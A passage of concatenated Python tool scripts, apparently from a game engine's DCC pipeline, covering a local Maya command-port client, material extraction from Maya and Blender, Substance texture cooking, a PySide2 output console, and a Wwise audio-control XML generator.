{}'.format(settings.QTFORPYTHON_PATH)) _LOGGER.info('LY_BIN_PATH: {}'.format(settings.LY_BIN_PATH)) _LOGGER.info('QT_PLUGIN_PATH: {}'.format(settings.QT_PLUGIN_PATH)) _LOGGER.info('QT_QPA_PLATFORM_PLUGIN_PATH: {}'.format(settings.QT_QPA_PLATFORM_PLUGIN_PATH)) _LOGGER.info('DCCSI_PYSIDE2_TOOLS: {}'.format(settings.DCCSI_PYSIDE2_TOOLS)) test_pyside2() # test PySide2 access with a pop-up button ``` #### File: Python/legacy_asset_converter/test_command_port.py ```python import socket import pickle import traceback import sys # BUFFER_SIZE = 4096 # port = 20201 # # if len(sys.argv) > 1: # port = sys.argv[1] # # def SendCommand(target_command): # maya_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # maya_socket.connect(('localhost', port)) # # try: # maya_socket.send("import maya.cmds as cmds".encode()) # data = maya_socket.recv(BUFFER_SIZE) # maya_socket.send("cmds.polySphere()".encode()) # data = maya_socket.recv(BUFFER_SIZE) # # # This is a workaround for replacing 
"null bytes" and converting # # return information as a list (as opposed to a string) # result = eval(data.decode().replace('\x00', '')) # print(result[0]) # except Exception as e: # print ('Connection Failed: {}'.format(e)) # finally: # maya_socket.close() # # # # maya.send('import maya.cmds as mc; mc.polyCube()') # # maya.close() # # if __name__=='__main__': # target_command = "import maya.cmds as mc; mc.polySphere();" # SendCommand(target_command) #Port Number 20201 # MayaVersion + 0 (Mel) or 1 (Python) # # import maya.cmds as mc # mc.commandPort(name=":20201", sourceType="python") # # # His user setup has this in it: # # if not mc.about(batch=True): # mc.commandPort(name=":20200", sourceType="mel") # mc.commandPort(name=":20201", sourceType="python") class MayaClient(object): PORT = 20201 BUFFER_SIZE = 4096 def __init__(self): self.maya_socket = None self.port = self.__class__.PORT def connect(self, port=-1): if port >= 0: self.port = port try: self.maya_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.maya_socket.connect(('localhost', self.PORT)) except: traceback.print_exc() return False return True def disconnect(self): try: self.maya_socket.close() except: traceback.print_exc() return False return True def send(self, cmd): try: self.maya_socket.sendall(cmd.encode()) except: traceback.print_exc() return None return self.recv() def recv(self): try: data = self.maya_socket.recv(MayaClient.BUFFER_SIZE) except: traceback.print_exc() return None return data.decode().replace('\x00', '') ################## # COMMANDS ##### ################## def echo(self, text): cmd = "eval(\"'{}'\")".format(text) return self.send(cmd) def new_file(self): cmd = "cmds.file(new=True, force=True)" return self.send(cmd) def create_primitive(self, shape): cmd = '' if shape == 'sphere': cmd += 'cmds.polySphere()' elif shape == 'cube': cmd += 'cmds.polyCube()' else: print('Invalid Shape: {}'.format(shape)) return None result = self.send(cmd) return eval(result) def translate(self, node, translation): cmd = "cmds.setAttr('{0}.translate', {1}, {2}, {3})".format(node, *translation) if __name__ == '__main__': maya_client = MayaClient() if maya_client.connect(): print('Connected successfully') print('Echo: {}'.format(maya_client.echo('hello world'))) file_name = maya_client.new_file() print(file_name) nodes = maya_client.create_primitive('sphere') print(nodes) maya_client.translate(nodes[0], [0, 10, 0]) nodes = maya_client.create_primitive('cube') print(nodes) if maya_client.disconnect(): print('Disconnected successfully') else: print('Failed to connect') if __name__ == "__main__": maya_client = MayaClient() ``` #### File: Python/maya_dcc_materials/minspect.py ```python import pymel.core as pmc import sys import types def syspath(): print 'sys.path:' for p in sys.path: print ' ' + p def info(obj): """Prints information about the object.""" lines = ['Info for %s' % obj.name(), 'Attributes:'] # Get the name of all attributes for a in obj.listAttr(): lines.append(' ' + a.name()) lines.append('MEL type: %s' % obj.type()) lines.append('MRO:') lines.extend([' ' + t.__name__ for t in type(obj).__mro__]) result = '\n'.join(lines) print result def _is_pymel(obj): try: # (1) module = obj.__module__ # (2) except AttributeError: # (3) try: module = obj.__name__ # (4) except AttributeError: return None # (5) return module.startswith('pymel') # (6) def _py_to_helpstr(obj): if isinstance(obj, basestring): return 'search.html?q=%s' % (obj.replace(' ', '+')) if not _is_pymel(obj): return None if isinstance(obj, 
types.ModuleType): return ('generated/%(module)s.html#module-%(module)s' % dict(module=obj.__name__)) if isinstance(obj, types.MethodType): return ('generated/classes/%(module)s/' '%(module)s.%(typename)s.html' '#%(module)s.%(typename)s.%(methname)s' % dict( module=obj.__module__, typename=obj.im_class.__name__, methname=obj.__name__)) if isinstance(obj, types.FunctionType): return ('generated/functions/%(module)s/' '%(module)s.%(funcname)s.html' '#%(module)s.%(funcname)s' % dict( module=obj.__module__, funcname=obj.__name__)) if not isinstance(obj, type): obj = type(obj) return ('generated/classes/%(module)s/' '%(module)s.%(typename)s.html' '#%(module)s.%(typename)s' % dict( module=obj.__module__, typename=obj.__name__)) def test_py_to_helpstr(): def dotest(obj, ideal): result = _py_to_helpstr(obj) assert result == ideal, '%s != %s' % (result, ideal) dotest('maya rocks', 'search.html?q=maya+rocks') dotest(pmc.nodetypes, 'generated/pymel.core.nodetypes.html' '#module-pymel.core.nodetypes') dotest(pmc.nodetypes.Joint, 'generated/classes/pymel.core.nodetypes/' 'pymel.core.nodetypes.Joint.html' '#pymel.core.nodetypes.Joint') dotest(pmc.nodetypes.Joint(), 'generated/classes/pymel.core.nodetypes/' 'pymel.core.nodetypes.Joint.html' '#pymel.core.nodetypes.Joint') dotest(pmc.nodetypes.Joint().getTranslation, 'generated/classes/pymel.core.nodetypes/' 'pymel.core.nodetypes.Joint.html' '#pymel.core.nodetypes.Joint.getTranslation') dotest(pmc.joint, 'generated/functions/pymel.core.animation/' 'pymel.core.animation.joint.html' '#pymel.core.animation.joint') dotest(object(), None) dotest(10, None) dotest([], None) dotest(sys, None) def test_py_to_helpstrFAIL(): assert 1 == 2, '1 != 2' import webbrowser # (1) HELP_ROOT_URL = ('http://help.autodesk.com/cloudhelp/2018/ENU/Maya-Tech-Docs/PyMel/')# (2) def pmhelp(obj): # (3) """Gives help for a pymel or python object. If obj is not a PyMEL object, use Python's built-in `help` function. If obj is a string, open a web browser to a search in the PyMEL help for the string. Otherwise, open a web browser to the page for the object. """ tail = _py_to_helpstr(obj) if tail is None: help(obj) # (4) else: webbrowser.open(HELP_ROOT_URL + tail) # (5) if __name__ == '__main__': test_py_to_helpstr() print 'Tests ran successfully.' ``` #### File: PythonTools/DCC_Material_Converter/blender_materials.py ```python import bpy import collections import json def get_shader_information(): """ Queries all materials and corresponding material attributes and file textures in the Blender scene. 
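    Each entry in the returned dictionary is keyed 'Material_<n>' and holds an
    ordered dictionary with the DCC application name, the applied mesh, the scene
    path, the material name, its shader type where one is detected, the gathered
    material attributes and any file texture connections.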
:return: """ # TODO - link file texture location to PBR material plugs- finding it difficult to track down how this is achieved # in the Blender Python API documentation and/or in forums materials_count = 1 shader_types = get_blender_shader_types() materials_dictionary = {} for target_mesh in [o for o in bpy.data.objects if type(o.data) is bpy.types.Mesh]: material_information = collections.OrderedDict(DccApplication='Blender', AppliedMesh=target_mesh, SceneName=bpy.data.filepath, MaterialAttributes={}, FileConnections={}) for target_material in target_mesh.data.materials: material_information['MaterialName'] = target_material.name shader_attributes = {} shader_file_connections = {} for node in target_material.node_tree.nodes: socket = node.inputs[0] print('NODE: {}'.format(node)) print('Socket: {}'.format(socket)) for material_input in node.inputs: attribute_name = material_input.name try: attribute_value = material_input.default_value print('Name: [{}] [{}] ValueType ::::::> {}'.format(attribute_name, attribute_value, type(attribute_value))) material_information['MaterialAttributes'].update({attribute_name: str(attribute_value)}) except Exception as e: pass print('\n') if node.type == 'TEX_IMAGE': material_information['FileConnections'].update({str(node): str(node.image.filepath)}) if node.name in shader_types.keys(): material_information['MaterialType'] = shader_types[node.name] # material_information['MaterialAttributes'] = shader_attributes materials_dictionary['Material_{}'.format(materials_count)] = material_information materials_count += 1 print('_________________________________________________________________\n') return materials_dictionary def get_blender_shader_types(): """ This returns all the material types present in the Blender scene :return: """ shader_types = {} ddir = lambda data, filter_str: [i for i in dir(data) if i.startswith(filter_str)] get_nodes = lambda cat: [i for i in getattr(bpy.types, cat).category.items(None)] cycles_categories = ddir(bpy.types, "NODE_MT_category_SH_NEW") for cat in cycles_categories: if cat == 'NODE_MT_category_SH_NEW_SHADER': for node in get_nodes(cat): shader_types[node.label] = node.nodetype return shader_types materials_dictionary = get_shader_information() #print('Materials Dictionary:') #print(materials_dictionary) #parsed = json.loads(str(materials_dictionary)) #print(json.dumps(parsed, indent=4, sort_keys=True)) ``` #### File: PythonTools/DCC_Material_Converter/maya_materials.py ```python from PySide2 import QtCore import maya.standalone maya.standalone.initialize(name='python') import maya.cmds as mc import collections import logging import json import sys import os for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) logging.basicConfig(level=logging.INFO, format='%(name)s - %(levelname)s - %(message)s', datefmt='%m-%d %H:%M', filename='output.log', filemode='w') class MayaMaterials(QtCore.QObject): def __init__(self, files_list, materials_count, parent=None): super(MayaMaterials, self).__init__(parent) self.files_list = files_list self.current_scene = None self.materials_dictionary = {} self.materials_count = int(materials_count) self.get_material_information() def get_material_information(self): """ Main entry point for the material information extraction. Because this class is run in Standalone mode as a subprocess, the list is passed as a string- some parsing/measures need to be taken in order to separate values that originated as a list before passed. 
:return: A dictionary of all of the materials gathered. Sent back to main UI through stdout """ for target_file in file_list: self.current_scene = os.path.abspath(target_file.replace('\'', '')) mc.file(self.current_scene, open=True, force=True) self.set_material_descriptions() json.dump(self.materials_dictionary, sys.stdout) @staticmethod def get_materials(target_mesh): """ Gathers a list of all materials attached to each mesh's shader :param target_mesh: The target mesh to pull attached material information from. :return: List of unique material values attached to the mesh passed as an argument. """ shading_group = mc.listConnections(target_mesh, type='shadingEngine') materials = mc.ls(mc.listConnections(shading_group), materials=1) return list(set(materials)) @staticmethod def get_shader(material_name): """ Convenience function for obtaining the shader that the specified material (as an argument) is attached to. :param material_name: Takes the material name as an argument to get associated shader object :return: """ connections = mc.listConnections(material_name, type='shadingEngine')[0] shader_name = '{}.surfaceShader'.format(connections) shader = mc.listConnections(shader_name)[0] return shader def get_shader_information(self, shader, material_mesh): """ Helper function for extracting shader/material attributes used to form the DCC specific dictionary of found material values for conversion. :param shader: The target shader object to analyze :param material_mesh: The material mesh needs to be passed to search for textures attached to it. :return: Complete set (in the form of two dictionaries) of file connections and material attribute values """ shader_file_connections = {} materials = self.get_materials(material_mesh) for material in materials: material_files = [x for x in mc.listConnections(material, plugs=1, source=1) if x.startswith('file')] for file_name in material_files: file_texture = mc.getAttr('{}.fileTextureName'.format(file_name.split('.')[0])) if os.path.basename(file_texture).split('.')[-1] != 'dds': key_name = mc.listConnections(file_name, plugs=1, source=1)[0] shader_file_connections[key_name] = file_texture shader_attributes = {} for shader_attribute in mc.listAttr(shader, s=True, iu=True): try: shader_attributes[str(shader_attribute)] = str(mc.getAttr('{}.{}'.format(shader, shader_attribute))) except Exception as e: logging.error('MayaAttributeError: {}'.format(e)) return shader_file_connections, shader_attributes def set_material_dictionary(self, material_name, material_type, material_mesh): """ When a unique material has been found, this creates a dictionary entry with all relevant material values. This includes material attributes as well as attached file textures. Later in the process this information is leveraged when creating the Lumberyard material definition. :param material_name: The name attached to the material :param material_type: Specific type of material (Arnold, Stingray, etc.) 
:param material_mesh: Mesh that the material is applied to :return: """ self.materials_count += 1 shader = self.get_shader(material_name) shader_file_connections, shader_attributes = self.get_shader_information(shader, material_mesh) material_dictionary = collections.OrderedDict(MaterialName=material_name, MaterialType=material_type, DccApplication='Maya', AppliedMesh=material_mesh, FileConnections=shader_file_connections, SceneName=str(self.current_scene), MaterialAttributes=shader_attributes) material_name = 'Material_{}'.format(self.materials_count) self.materials_dictionary[material_name] = material_dictionary logging.info('\n\n:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n' 'MATERIAL DEFINITION: {} \n' ':::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n{}'.format( self.materials_dictionary[material_name]['MaterialType'], json.dumps(self.materials_dictionary[material_name], indent=4))) def set_material_descriptions(self): """ This function serves as the clearinghouse for all analyzed materials passing through the system. It will determine whether or not the found material has already been processed, or if it needs to be added to the final material dictionary. In the event that an encountered material has already been processed, this function creates a register of all meshes it is applied to in the 'AppliedMesh' attribute. :return: """ scene_geo = mc.ls(v=True, geometry=True) for target_mesh in scene_geo: material_list = self.get_materials(target_mesh) for material_name in material_list: material_type = mc.nodeType(material_name) if material_type != 'lambert': material_listed = [x for x in self.materials_dictionary if self.materials_dictionary[x]['MaterialName'] == material_name] if not material_listed: self.set_material_dictionary(str(material_name), str(material_type), str(target_mesh)) else: mesh_list = self.materials_dictionary[material_name].get('AppliedMesh') if not isinstance(mesh_list, list): self.materials_dictionary[str(material_name)]['AppliedMesh'] = [mesh_list, target_mesh] else: mesh_list.append(target_mesh) # ++++++++++++++++++++++++++++++++++++++++++++++++# # Maya Specific Shader Mapping # # ++++++++++++++++++++++++++++++++++++++++++++++++# file_list = sys.argv[1:-1] count = sys.argv[-1] instance = MayaMaterials(file_list, count) ``` #### File: Substance/builder/sbsar_utils.py ```python import os import sys import site import subprocess import logging as _logging # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # set up global space, logging etc. 
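# For context, env_bool() imported below is assumed to resolve an environment
# variable against a default roughly like this (illustrative sketch only; the
# real implementation lives in azpy.env_bool):
#
#   def env_bool(envar, default):
#       value = os.getenv(envar, str(default))
#       return str(value).strip().lower() in ('1', 'true', 'yes', 'on')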
from azpy.env_bool import env_bool from azpy.constants import ENVAR_DCCSI_GDEBUG from azpy.constants import ENVAR_DCCSI_DEV_MODE # we boostrap access to some lib site-packages from dynaconf import settings from pathlib import Path _G_DEBUG = env_bool(ENVAR_DCCSI_GDEBUG, settings.DCCSI_GDEBUG) _DCCSI_DEV_MODE = env_bool(ENVAR_DCCSI_DEV_MODE, settings.DCCSI_DEV_MODE) _MODULENAME = 'DCCsi.SDK.substance.builder.sbsar_utils' _LOGGER = _logging.getLogger(_MODULENAME) _LOGGER.debug('Starting up: {0}.'.format({_MODULENAME})) # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # substance automation toolkit (aka pysbs) # To Do: manage with dynaconf environment from azpy.constants import PATH_SAT_INSTALL_PATH _SAT_INSTALL_PATH = Path(PATH_SAT_INSTALL_PATH).resolve() site.addsitedir(str(_SAT_INSTALL_PATH)) # 'install' is the folder I created # Susbstance import pysbs.batchtools as pysbs_batch import pysbs.context as _pysbs_context _PYSBS_CONTEXT = _pysbs_context.Context() # ------------------------------------------------------------------------- # -------------------------------------------------------------------------- def cook_sbsar(input_sbs, cook_output_path): """ Doc String""" input_sbs = Path(input_sbs).resolve() cook_output_path = Path(cook_output_path).resolve() if not cook_output_path.exists(): try: cook_output_path.mkdir() except: _LOGGER.warning('Could not mkdir: {}'.format(cook_output_path)) output_name = input_sbs.stem pysbs_batch.sbscooker(quiet=True, inputs=str(input_sbs), includes=_PYSBS_CONTEXT.getDefaultPackagePath(), alias=_PYSBS_CONTEXT.getUrlAliasMgr().getAllAliases(), output_path=str(cook_output_path), output_name=output_name, compression_mode=2).wait() new_file = Path(cook_output_path, output_name + '.sbsar').resolve() if new_file.exists(): return new_file # -------------------------------------------------------------------------- # -------------------------------------------------------------------------- def info_sbsar(input_path): """ Doc String""" sbsar_info = [] in_file = Path(input_path).resolve() input_n_output = pysbs_batch.sbsrender_info(input=str(in_file), stdout=subprocess.PIPE) for info in input_n_output.stdout.read().splitlines(): sbsar_info.append(info.decode('utf-8')) return sbsar_info # -------------------------------------------------------------------------- # -------------------------------------------------------------------------- def output_info(cook_output_path, output_name, output_type): """ Doc String""" info_lists = [] input_file = Path(cook_output_path, output_name + '.sbsar').resolve() input_n_output = pysbs_batch.sbsrender_info(input=str(input_file), stdout=subprocess.PIPE) for info_list in input_n_output.stdout.read().splitlines(): info_lists.append(info_list.decode('utf-8')) tex_maps, params, output_size, presets, inputs = [], [], [], [], [] for info_list in info_lists: if 'OUTPUT' in info_list: tex_maps.append(info_list.split(' ')[3]) elif 'INPUT $' in info_list: params.append(info_list.split(' ')[3:]) elif 'PRESET' in info_list: presets.append(info_list.split('PRESET ')[1]) elif 'INPUT' in info_list and not '$' in info_list: inputs.append(info_list.split(' ')[3:]) output_info = {'tex_maps': tex_maps, 'params': params, 'output_size': output_size, 'presets': presets, 'inputs': inputs} return output_info[output_type] # To Do: Make preset a optional argument. 
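# One possible shape for that change (an illustrative sketch only, nothing
# below is wired in yet): give the parameter a default so callers can omit it
# and fall back to the "no preset" branch inside render_sbsar(), e.g.
#
#   def render_sbsar(cook_output_path, output_texture_type, sbsar_name,
#                    render_to_output_path, output_size, random_seed,
#                    use_preset=-1):
#       ...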
# -------------------------------------------------------------------------- # -------------------------------------------------------------------------- def render_sbsar(cook_output_path, output_texture_type, sbsar_name, render_to_output_path, use_preset, output_size, random_seed): """ Render textures maps from SBSAR""" # _tex_output = ['diffuse', 'basecolor', 'normal'] # print(_tex_output) cook_output_path = Path(cook_output_path).resolve() texture_path = Path(render_to_output_path).resolve() sbsar_file = Path(cook_output_path, sbsar_name + '.sbsar').resolve() if output_info(cook_output_path, sbsar_name, 'presets'): if use_preset == -1: preset_base = '_' pysbs_batch.sbsrender_render(inputs=str(sbsar_file), # input_graph=_inputGraphPath, input_graph_output=str(output_texture_type), output_path=str(texture_path), output_name=sbsar_name + preset_base + '{outputNodeName}', output_format='tif', set_value=['$outputsize@{},{}'.format(output_size, output_size), '$randomseed@{}'.format(random_seed)], no_report=True, verbose=True ).wait() else: preset_name = output_info(cook_output_path, sbsar_name, 'presets')[use_preset] preset_base = '_' pysbs_batch.sbsrender_render(inputs=str(sbsar_file), # input_graph=_inputGraphPath, input_graph_output=str(output_texture_type), output_path=str(texture_path), output_name=sbsar_name + preset_base + preset_name.replace(' ', '') + '_{outputNodeName}', output_format='tif', set_value=['$outputsize@{},{}'.format(output_size, output_size), '$randomseed@{}'.format(random_seed)], use_preset=preset_name, no_report=True, verbose=True ).wait() else: pysbs_batch.sbsrender_render(inputs=str(sbsar_file), # input_graph=_inputGraphPath, input_graph_output=str(output_texture_type), output_path=str(texture_path), output_name=sbsar_name + '_{outputNodeName}', output_format='tif', set_value=['$outputsize@{},{}'.format(output_size, output_size), '$randomseed@{}'.format(random_seed)], no_report=True, verbose=True ).wait() # -------------------------------------------------------------------------- ########################################################################### # Main Code Block, runs this script as main (testing) # ------------------------------------------------------------------------- if __name__ == "__main__": """Run this file as main""" # --------------------------------------------------------------------- # Defining CONSTANTS # To Do: shouldn't need this _SYNTH_ENV_DICT (replace with dynaconf config) from azpy import synthetic_env _SYNTH_ENV_DICT = synthetic_env.stash_env() from azpy.constants import ENVAR_DCCSIG_PATH from azpy.constants import ENVAR_LY_PROJECT_PATH # grab a specific path from the base_env _PATH_DCCSI = _SYNTH_ENV_DICT[ENVAR_DCCSIG_PATH] # use DCCsi as the project path for this test _LY_PROJECT_PATH = _PATH_DCCSI _PROJECT_ASSETS_PATH = Path(_LY_PROJECT_PATH, 'Assets').resolve() _PROJECT_MATERIALS_PATH = Path(_PROJECT_ASSETS_PATH, 'Materials').resolve() # this will combine two parts into a single path (object) # It also returnd the fixed-up version (norm) _PATH_OUTPUT = Path(_PROJECT_MATERIALS_PATH, 'Fabric') _PATH_INPUT_SBS = Path(_PROJECT_MATERIALS_PATH, 'Fabric', 'fabric.sbsar') # --------------------------------------------------------------------- _LOGGER.debug("{0} :: if __name__ == '__main__':".format(_MODULENAME)) _LOGGER.debug('_SYNTH_ENV_DICT: {}'.format(_SYNTH_ENV_DICT)) _LOGGER.info('presets: {}'.format(output_info(_PATH_OUTPUT, _PATH_INPUT_SBS.stem, 'presets'))) _LOGGER.info('params: {}'.format(output_info(_PATH_OUTPUT, 
_PATH_INPUT_SBS.stem, 'params'))) _LOGGER.info('inputs: {}'.format(output_info(_PATH_OUTPUT, _PATH_INPUT_SBS.stem, 'inputs'))) _LOGGER.info('tex_maps: {}'.format(output_info(_PATH_OUTPUT, _PATH_INPUT_SBS.stem, 'tex_maps'))) _LOGGER.info(info_sbsar(Path(_PATH_INPUT_SBS))) new_file = cook_sbsar(_PATH_INPUT_SBS, Path(_PATH_OUTPUT, '.tests')) if new_file: _LOGGER.info('Cooked out: {}'.format(new_file)) render_sbsar(cook_output_path=Path(_PATH_OUTPUT, '.tests'), output_texture_type='basecolor', sbsar_name=_PATH_INPUT_SBS.stem, render_to_output_path=Path(_PATH_OUTPUT, '.tests'), use_preset=-1, output_size=256, random_seed=1001) # remove the logger del _LOGGER # ---- END --------------------------------------------------------------- ``` #### File: builder/ui/PySide2_qtextedit_stdout.py ```python import sys from PySide2.QtCore import QProcess, Signal, Slot, QTextCodec from PySide2.QtGui import QTextCursor from PySide2.QtWidgets import QApplication, QPlainTextEdit from PySide2.QtCore import QTimer class ProcessOutputReader(QProcess): produce_output = Signal(str) def __init__(self, parent=None): super().__init__(parent=parent) # merge stderr channel into stdout channel self.setProcessChannelMode(QProcess.MergedChannels) # prepare decoding process' output to Unicode self._codec = QTextCodec.codecForLocale() self._decoder_stdout = self._codec.makeDecoder() # only necessary when stderr channel isn't merged into stdout: # self._decoder_stderr = codec.makeDecoder() self.readyReadStandardOutput.connect(self._ready_read_standard_output) # only necessary when stderr channel isn't merged into stdout: # self.readyReadStandardError.connect(self._ready_read_standard_error) @Slot() def _ready_read_standard_output(self): raw_bytes = self.readAllStandardOutput() text = self._decoder_stdout.toUnicode(raw_bytes) self.produce_output.emit(text) # only necessary when stderr channel isn't merged into stdout: # @Slot() # def _ready_read_standard_error(self): # raw_bytes = self.readAllStandardError() # text = self._decoder_stderr.toUnicode(raw_bytes) # self.produce_output.emit(text) class MyConsole(QPlainTextEdit): def __init__(self, parent=None): super().__init__(parent=parent) self.setReadOnly(True) self.setMaximumBlockCount(10000) # limit console to 10000 lines self._cursor_output = self.textCursor() @Slot(str) def append_output(self, text): self._cursor_output.insertText(text) self.scroll_to_last_line() def scroll_to_last_line(self): cursor = self.textCursor() cursor.movePosition(QTextCursor.End) cursor.movePosition(QTextCursor.Up if cursor.atBlockStart() else QTextCursor.StartOfLine) self.setTextCursor(cursor) def output_text(self, text): self._cursor_output.insertText(text) self.scroll_to_last_line() # create the application instance app = QApplication(sys.argv) # create a process output reader reader = ProcessOutputReader() # create a console and connect the process output reader to it console = MyConsole() reader.produce_output.connect(console.append_output) reader.start('python', ['-u', 'C:\\dccapi\\dev\\Gems\\DccScriptingInterface\\LyPy\\si_substance\\builder\\watchdog' '\\__init__.py', 'C:\\Users\\chunghao\\Documents\\Allegorithmic\\Substance Designer' '\\sbsar']) # start the process console.show() # make the console visible # app.exec_() # run the PyQt main loop timer = QTimer() timer.timeout.connect(lambda: None) timer.start(100) sys.exit(app.exec_()) ``` #### File: Tools/WwiseATLGen/wwise_atl_gen_tool.py ```python from argparse import ArgumentParser from operator import attrgetter from xml.dom import 
minidom from xml.etree import ElementTree import os import sys __version__ = '0.1.0' __copyright__ = 'Copyright (c) Contributors to the Open 3D Engine Project. For complete copyright and license terms please see the LICENSE at the root of this distribution..' all_events = set() all_parameters = set() all_preloads = set() all_auxbusses = set() all_switches = dict() all_states = dict() SWITCH_TYPE = 0 STATE_TYPE = 1 def get_options(): parser = ArgumentParser(description='Process soundbank metadata and generate ATL xml data for Lumberyard.\n' 'Path arguments can be relative to the working directory of this script.') parser.add_argument('--bankPath', required=True, help='Root path where to look for banks, e.g. <Project>\\Sounds\\wwise') parser.add_argument('--atlPath', required=True, help='Output path for the ATL controls, e.g. <Project>\\libs\\gameaudio\\wwise') parser.add_argument('--atlName', required=True, help='Name of the output xml file, e.g. generated_controls.xml') parser.add_argument('--autoLoad', required=False, action='store_true', help='Whether "AutoLoad" setting should be applied to new SoundBanks. Consecutive runs of ' 'this script on the same output file will preserve any "AutoLoad" settings that were ' 'there before. This flag will apply "AutoLoad" to any SoundBanks that appear to be new.') parser.add_argument('--printDebug', required=False, action='store_true', help='Print out the parsed Wwise data to stdout') options = parser.parse_args() if os.path.exists(options.atlPath): print('ATL File Path: {}'.format(os.path.join(options.atlPath, options.atlName))) else: sys.exit('--atlPath {}: Path does not exist!'.format(options.atlPath)) if os.path.exists(options.bankPath): print('Bank Root Path: {}'.format(options.bankPath)) else: sys.exit('--bankPath {}: Path does not exist!'.format(options.bankPath)) print() return options class ATLType: def __init__(self, name, path): def fix_path(_path): """ Modifies the format of a path that came from a Wwise .txt file 1) Converts all backslashes to forwardslashes 2) Cuts off the last part of the path, which is equal to name 3) Trims the slash from the beginning of the path :param _path: Input path string :return: Modified path string """ _path = _path.replace('\\', '/') # HACK: if _path.endswith(name): _path = os.path.dirname(_path) if len(_path) > 0 and _path[0] == '/': return _path[1:] else: return _path self.name = name self.path = fix_path(path) self.name_attr = 'atl_name' self.path_attr = 'path' self.element = __class__.__name__ def __str__(self): return '{}/{}'.format(self.path, self.name) def __eq__(self, other): return self.name == other.name and self.path == other.path def __hash__(self): return hash((self.name, self.path)) def attach_xml(self, node): return ElementTree.SubElement(node, self.element, attrib={self.name_attr: self.name, self.path_attr: self.path}) class ATLEnvironment(ATLType): def __init__(self, name, path): super().__init__(name, path) self.element = __class__.__name__ self.auxbus = WwiseAuxBus(self.name) def attach_xml(self, node): atl_env = super().attach_xml(node) self.auxbus.attach_xml(atl_env) class ATLTrigger(ATLType): def __init__(self, name, path): super().__init__(name, path) self.element = __class__.__name__ self.event = WwiseEvent(self.name) def attach_xml(self, node): atl_trigger = super().attach_xml(node) self.event.attach_xml(atl_trigger) class ATLRtpc(ATLType): def __init__(self, name, path): super().__init__(name, path) self.element = __class__.__name__ self.param = WwiseRtpc(self.name) def 
attach_xml(self, node): atl_rtpc = super().attach_xml(node) self.param.attach_xml(atl_rtpc) class ATLSwitch(ATLType): def __init__(self, name, path): super().__init__(name, path) self.element = __class__.__name__ self.states = dict() def attach_xml(self, node): atl_switch = super().attach_xml(node) for switch_state in sorted(self.states.values(), key=attrgetter('name')): switch_state.attach_xml(atl_switch) class ATLSwitchState(ATLType): def __init__(self, name, switch_name, wwise_type): super().__init__(name, switch_name) # Here the 'path' will denote the parent ATLSwitch name. # The ATLSwitch has it's own 'path' member so that data is still reachable. self.wwise_type = wwise_type self.element = __class__.__name__ if self.wwise_type == SWITCH_TYPE: self.state = WwiseSwitch(self.name, switch_name) elif self.wwise_type == STATE_TYPE: self.state = WwiseState(self.name, switch_name) def __eq__(self, other): return self.name == other.name and self.path == other.path and self.wwise_type == other.wwise_type def attach_xml(self, node): atl_switch_state = ElementTree.SubElement(node, self.element, attrib={self.name_attr: self.name}) if self.state: self.state.attach_xml(atl_switch_state) class ATLPreloadRequest(ATLType): def __init__(self, name, path, is_loc, is_autoload): super().__init__(name, path) self.element = __class__.__name__ self.autoload_attr = 'atl_type' self.autoload = is_autoload self.param = WwiseFile(self.name + '.bnk', is_loc) def attach_xml(self, node): atl_preload = super().attach_xml(node) if self.autoload: atl_preload.set(self.autoload_attr, 'AutoLoad') self.param.attach_xml(atl_preload) class WwiseType: def __init__(self, name): self.name = name self.name_attr = 'wwise_name' self.element = __class__.__name__ def attach_xml(self, node): return ElementTree.SubElement(node, self.element, attrib={self.name_attr: self.name}) class WwiseAuxBus(WwiseType): def __init__(self, name): super().__init__(name) self.element = __class__.__name__ class WwiseEvent(WwiseType): def __init__(self, name): super().__init__(name) self.element = __class__.__name__ class WwiseRtpc(WwiseType): def __init__(self, name): super().__init__(name) self.element = __class__.__name__ class WwiseValue(WwiseType): def __init__(self, name): super().__init__(name) self.element = __class__.__name__ class WwiseSwitch(WwiseType): def __init__(self, name, path): super().__init__(path) # This inits with 'path', the WwiseValue uses the 'name' self.element = __class__.__name__ self.value = WwiseValue(name) def attach_xml(self, node): switch = super().attach_xml(node) self.value.attach_xml(switch) class WwiseState(WwiseType): def __init__(self, name, path): super().__init__(path) # This inits with 'path', the WwiseValue uses the 'name' self.element = __class__.__name__ self.value = WwiseValue(name) def attach_xml(self, node): state = super().attach_xml(node) self.value.attach_xml(state) class WwiseFile(WwiseType): def __init__(self, name, is_loc): super().__init__(name) self.element = __class__.__name__ self.localized = is_loc self.loc_attr = 'wwise_localized' def attach_xml(self, node): wwise_file_node = super().attach_xml(node) if self.localized: wwise_file_node.set(self.loc_attr, 'true') def get_load_types_of_existing_preloads(atl_file): """ Pre-parses the ATL controls file if it exists and returns lists of preloads that were marked as auto-load and ones that weren't. :param atl_file: ATL Controls xml file :return: Lists of preload names that are manual-load and auto-load. 
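    The nodes being inspected look roughly like this (bank name illustrative):

        <ATLPreloadRequest atl_name="music" path="SoundBanks" atl_type="AutoLoad">
            <WwiseFile wwise_name="music.bnk"/>
        </ATLPreloadRequest>

    and a typical call (path illustrative) is:

        manual, auto = get_load_types_of_existing_preloads(
            'libs/gameaudio/wwise/generated_controls.xml')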
""" manual = [] auto = [] if os.path.exists(atl_file): try: atl_doc = ElementTree.parse(atl_file) except ElementTree.ParseError as e: sys.exit('Error parsing {} at line {}, column {}'.format(atl_file, e.position[0], e.position[1])) root = atl_doc.getroot() audio_preloads_node = root.find('./AudioPreloads') if audio_preloads_node is not None: autoloads = audio_preloads_node.findall('./ATLPreloadRequest') for node in autoloads: preload_name = node.get('atl_name') if node.get('atl_type') == 'AutoLoad': auto.append(preload_name) else: manual.append(preload_name) return manual, auto def scan_for_localization_folders(folder): """ Full scan of root folder to determine what paths are 'localized' bank paths. If a folder contains an 'init.bnk' file, then that's considered a main bank folder. Any subfolders of a main bank folder, with the exception of one named 'external', is considered localized. :param folder: Starting root folder for the scan :return: List of localized bank paths """ loc_bank_paths = [] for root, dirs, files in os.walk(folder): if 'init.bnk' in map(str.lower, files): path_gen = (d for d in dirs if d.lower() != 'external') for d in path_gen: loc_bank_paths.append(os.path.join(root, d)) return loc_bank_paths def get_bnktxt_files(folder): """ Recursive generator that yields files in a folder that... 1) Have a .txt extension 2) 